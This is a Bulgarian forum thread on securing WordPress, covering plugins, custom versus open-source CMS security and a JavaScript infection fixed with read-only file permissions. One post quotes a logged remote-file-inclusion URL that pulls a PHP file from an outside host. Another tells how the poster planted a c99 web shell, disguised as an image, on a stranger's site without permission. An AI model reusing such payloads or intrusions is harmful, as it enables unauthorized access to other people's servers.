Съобщение

Collapse
No announcement yet.

Да стегнем малко горкия, беззащитен Wordpress :)

Collapse
Това е важна тема.
X
X
  • Филтър
  • Период
  • Показване на
Clear All
нови коментари

За: Да стегнем малко горкия, беззащитен Wordpress

Първоначално публикувано от Truden View Post
    Не е ли по-простичко да се инсталира разширението "Secure WordPress"?
    Не съм запознат с това разширение и не мога да коментирам. Аз за момента не искам да слагам допълнителни разширения. Колкото повече разширения, толкова повече неприятности .

Коментар

Първоначално публикувано от scoobydoo View Post
      Не съм запознат с това разширение и не мога да коментирам. Аз за момента не искам да слагам допълнителни разширения. Колкото повече разширения, толкова повече неприятности .
      Аз ползвам "Secure WordPress" от доста време и досега не съм имал проблеми.
      Виждам опити за хакване с външен файл, нещо като (string: /wp-content/themes/моята_тема/_tbs.php?src=http://blogger.com.v2training.com.au/xcyb/xcyb.php), но досега всичките безуспешни.

Коментар

За: Re: Да стегнем малко горкия, беззащитен Wordpress

Първоначално публикувано от Ma57eR View Post
        Аз не съм много съгласен с твърдението, че къстъма е по-сигурен. За малък сайт може би, но не и за по-сериозни проекти.
        За мен не е възможно екип от хора (десетина да речем) да направят и защитят нещо толкова добре, колкото комюнити от десетки хиляди(да не кажа стотици хиляди) потребители, които съобщават за дадени бъгове, дупки и подобни. По-скоро проблемите идват от зле написани допълнителни функционалности за дадената система, които отварят дупки.

Разликата идва от там, че за безплатните CMS, когато излезне експлойт, той се разпространява бързо в определени среди, че достига и до потребители, които не знаят какво точно правят, но повтарят дадени стъпки и пробиват дадена система.
        При къстъм система проблеми създават само разбиращи хора, които са решили да направят мръсотия.
        Cloxy имаше друго предвид, като каза, че по-сигурно от custom няма...

Просто custom решението е писано самостоятелно и до сорс кода нямат достъп толкова много хора, че да откриват дупки. Не, че е невъзможно да има дупки в едно custom решение, но просто много по-трудно ще се открият, отколкото да седнеш и да разгледаш как работи кода и да ти дойде на ум, че тука може да се появи проблем при еди-каква си ситуация

Коментар

Re: Да стегнем малко горкия, беззащитен Wordpress

Съгласен съм с теб Вирос - написал съм го в последното изречение. Просто при къстъм може да се очакват атаки само от разбиращи от това хора, а не от всеки пъпчив тийн, решил да става "хакер"

Коментар

За да напишеш custom защита, трябва да знаеш слабото място, което трябва да се защити, но ако го знаеш, ще го кажеш на Wordpress и те ще го оправят.
            Аз от години ползвам защита на админ файла си в Truden Web Site (http://truden.com/admin.php) но това не помага срещу инжекции в ДБ.
            Празни индекс файлове крият директориите от любопитни погледи, но не са пречка за хакване.
            Трябва защита срещу Bad Queries и за това си има разширения за WorPress.
            Ако те не работят, тогава сме обречени, до откриване на дупката и нейното запушване.

Коментар

Re: За: Re: Да стегнем малко горкия, беззащитен Wordpress

Първоначално публикувано от Virosss View Post
              Просто custom решението е писано самостоятелно и до сорс кода нямат достъп толкова много хора, че да откриват дупки. Не, че е невъзможно да има дупки в едно custom решение, но просто много по-трудно ще се открият, отколкото да седнеш и да разгледаш как работи кода и да ти дойде на ум, че тука може да се появи проблем при еди-каква си ситуация
              Аз съм на мнение, че една система ако е писана с мисъл и сигурността е била на дневен ред, тя няма хакване. При custom системите има по-голяма вероятност това да се случи, но не е гаранция, разбира се.

Крайно не съм съгласен с това, че дадена система е уязвима, когато я използват много потребители и/или кодът и е отворен. Така говореха преди за Windows-а, сега и за WordPress. С това не мога да се съглася.

Некадърно написания код си е некадърно написан. WordPress е живото доказателство за това. Всеки, разбиращ от програмиране, ще забележи елементарни пропуски в кода му. Лошото е, че в повечето случаи те са фундаментални, в смисъл, вече е късно да се оправят, защото нещо някъде ще спре да работи.

И истинските експлойти не изтичат в мрежата, откривателите си ги пазят за себе си и не са чак толкова нагли. Те взимат малко и не се набиват на очи.

Коментар

За: Re: Да стегнем малко горкия, беззащитен Wordpress

Да ти покажа ли колко хора са репортнали JS вируса за WordPress 3.3.1 в техния форум и как това комюинити от стотици хиляди програмисти не си е направило труда да го запуши? Как е ме обедиш, че това комюнити ще поддържа дадена версия стабилна и защитета след като вече 4 месеца се дъвче един и същ проблем и никой от тях не го е фикснал. Какъв е комуникационния канал с тези стотици хиляди "програмисти" ? Ако ти хакнат къстъм система поне можеш да се съвржеш с тези 10 човека и те да ти пачнат експлойта, а в другия случай репортвате, репортвате и чакате да падне тавана. Между другото за тези, които ги е ударил JS вируса решението е: почистване и смяна на правата за .js файловете на (444 - само за четене). Под конзола става с една команда така, че тикет до съпорта върши работа и е по-малко инвазивно от това да го правите с FTP, особенно ако имате по30000 и нагоре файлове в акаунта си.

Първоначално публикувано от Ma57eR View Post
                Аз не съм много съгласен с твърдението, че къстъма е по-сигурен. За малък сайт може би, но не и за по-сериозни проекти.
                За мен не е възможно екип от хора (десетина да речем) да направят и защитят нещо толкова добре, колкото комюнити от десетки хиляди(да не кажа стотици хиляди) потребители, които съобщават за дадени бъгове, дупки и подобни. По-скоро проблемите идват от зле написани допълнителни функционалности за дадената система, които отварят дупки.

Разликата идва от там, че за безплатните CMS, когато излезне експлойт, той се разпространява бързо в определени среди, че достига и до потребители, които не знаят какво точно правят, но повтарят дадени стъпки и пробиват дадена система.
                При къстъм система проблеми създават само разбиращи хора, които са решили да направят мръсотия.

Коментар

Cloxy и съм склонен да се съглася и не съвсем...
                  Да прав си, че кадърно написаното си е кадърно написано, но в случая много по-лесно е да откриеш дупка, ако имаш сорс кода.. Практически е много трудно човек да предвиди всички сценарии и от там понякога изкачат проблемите.

Въпреки всичко голям % от хакванията са от небрежност на потребителите, щото просто не знаят как да се пазят. Обикновено след като се появи информация за сериозна дупка, се намират поне няколко теми в които се описва как да я фикснеш и т.н. За пример преди 2 дена попаднах на сайт на който беше инсталиран WP на субдомейн. На основният беше сложен WP, но не беше инсталиран. За пробата го инсталирах с външна db, ъплоаднах си c99 шел( за по-лесна работа ) с разширение за снимка... следва команда за промяна на разширението на .php, отворих си шела и вече имах почти пълен достъп до сайтовете на хостинга, включително и данните за локалното db и спомойно можех да си сменя паролата и да си скрия 2-3 линк-а... е от тогава се опитвам да се свържа с собственика да го предупредя за проблема и да си го оправи, щото не ми се мисли колко поразия може да му направи някой, буквално за секунди.

Ето един прекрасен пример, как човек сам застрашава сайтовете си... така, че колкото и да е перфектно написана една система, ако не знаеш как да я настроиш и да я подсигуриш и господ не може да ти помогне.

Коментар

Ето ТУК Суперхостинг са описали няколко начина за защита на wp!Явно този пропуск на WordPress в защита е опарило доста хора включително и мен

Коментар

Първоначално публикувано от s1yf0x View Post
                      Да ти покажа ли колко хора са репортнали JS вируса за WordPress 3.3.1 в техния форум и как това комюинити от стотици хиляди програмисти не си е направило труда да го запуши? Как е ме обедиш, че това комюнити ще поддържа дадена версия стабилна и защитета след като вече 4 месеца се дъвче един и същ проблем и никой от тях не го е фикснал. Какъв е комуникационния канал с тези стотици хиляди "програмисти" ? Ако ти хакнат къстъм система поне можеш да се съвржеш с тези 10 човека и те да ти пачнат експлойта, а в другия случай репортвате, репортвате и чакате да падне тавана. Между другото за тези, които ги е ударил JS вируса решението е: почистване и смяна на правата за .js файловете на (444 - само за четене). Под конзола става с една команда така, че тикет до съпорта върши работа и е по-малко инвазивно от това да го правите с FTP, особенно ако имате по30000 и нагоре файлове в акаунта си.
                      Разбрал си ме донякъде погрешно - под Комюнити не съм имал предвид програмисти, а потребители, които репортват. Това, че създателите все още не са предприели никакви мерки, говори лошо за тях като цяло. Никой в нищо не искам да убеждавам, а изказвам собственото си мнение
                      Масова смяна на правата може да се прави и с доста от FTP клиентите.
                      А и като цяло визирах CMS-ите, не само Wordpress. Лично не го ползвам - една две инсталации съм правил до момента - за проба на един-два плъгина и за редизайн на един шаблон.
                      Имам доста по-голям опит с Joomla и там е имало случаи да се изкарват версии буквално през 2-3 дена, защото е открита слабост.

Като цяло, непробиваема защита няма.

Коментар

Първоначално публикувано от s1yf0x View Post
                        .... Между другото за тези, които ги е ударил JS вируса решението е: почистване и смяна на правата за .js файловете на (444 - само за четене).....
                        Имаш в предвид ВСИЧКИ .js файлове да се направят само за четене???

Коментар

За: Re: За: Re: Да стегнем малко горкия, беззащитен Wordpress

Да, тъй като заразяването става в различни .js файлове - горе долу на който попадне.
                          Първоначално публикувано от bulram View Post
                          Имаш в предвид ВСИЧКИ .js файлове да се направят само за четене???

Коментар

Това с js файловете бихте ли го препоръчали на всеки потребител да си го направи? В смисъл, ще има ли някакви негативни последствия? Примерно да не може да се редактират такива файлове през админ панела или да не работят някои плъгини?

Коментар

Не би трябвало да е проблем

Коментар

Първоначално публикувано от scoobydoo View Post
                                Това с js файловете бихте ли го препоръчали на всеки потребител да си го направи? В смисъл, ще има ли някакви негативни последствия? Примерно да не може да се редактират такива файлове през админ панела или да не работят някои плъгини?
                                Мъка ще е като се ъпдейтва плъгин или вп-то - ще трябва да им разрешаваш писането всеки път ... изобщо... мъка мъка...

Коментар

Изчакайте...
                                X